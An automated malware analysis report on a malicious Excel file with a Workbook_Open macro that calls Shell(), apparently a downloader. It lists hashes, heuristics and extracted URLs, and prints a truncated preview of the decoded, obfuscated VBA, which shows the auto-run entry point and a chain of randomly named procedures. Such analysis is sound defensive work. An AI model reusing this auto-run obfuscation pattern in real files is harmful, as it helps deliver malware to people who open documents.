Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5b9c3a3bbfa89c8…

MALICIOUS

Office (OLE)

Size: 469.5 KB
Created: 2017-07-31 21:33:49
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: 703ac195bbe7e93a41f172168be94011
SHA-1: 27c0f93d1a25e6ae12b60724c23fa51ebd55cbdf
SHA-256: c5b9c3a3bbfa89c83e1fb3955492044fd8bf61f7061ce1a0722a393e974cec7c
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro that calls the Shell() function. This indicates an attempt to execute arbitrary commands, a technique commonly used to download and run additional malicious payloads. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports the malicious verdict. The macro's obfuscation (visible in the extracted source as a long chain of randomly named procedures calling one another) and the presence of the Shell() call strongly suggest downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Xls.Malware.Valyria-10036514-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Callback phishing phone lure [medium] SE_CALLBACK_LURE
    Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.edefter.gov.tr (in document text, OLE body)
    • http://www.xbrl.org/int/gl/bus/2006-10-25 (in document text, OLE body)
    • http://www.xbrl.org/int/gl/cor/2006-10-25 (in document text, OLE body)
    • http://www.xbrl.org/int/gl/muc/2006-10-25 (in document text, OLE body)
    • http://www.xbrl.org/int/gl/plt/2006-10-25 (in document text, OLE body)
    • http://www.xbrl.org/2003/iso4217 (in document text, OLE body)
    • http://www.xbrl.org/2005/iso639 (in document text, OLE body)
    • http://www.xbrl.org/2003/linkbase (in document text, OLE body)
    • http://www.xbrl.org/2003/instance (in document text, OLE body)
    • http://www.gib.gov.tr (in document text, OLE body)
    • http://www.ortadogusondaj.com (in document text, OLE body)
    • http://www.w3.org/2000/09/xmldsig# (in document text, OLE body)
    • http://uri.etsi.org/01903/v1.3.2# (in document text, OLE body)
    • http://www.w3.org/2001/XMLSchema-instance (in document text, OLE body)
    • http://www.w3.org/1999/xlink (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 111652 bytes
SHA-256: 58be2706cd19ffe711673aface151069d2919e8615bc27fcd67150a93fe2f4bc
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Worksheet"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheets"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Fu
... (truncated)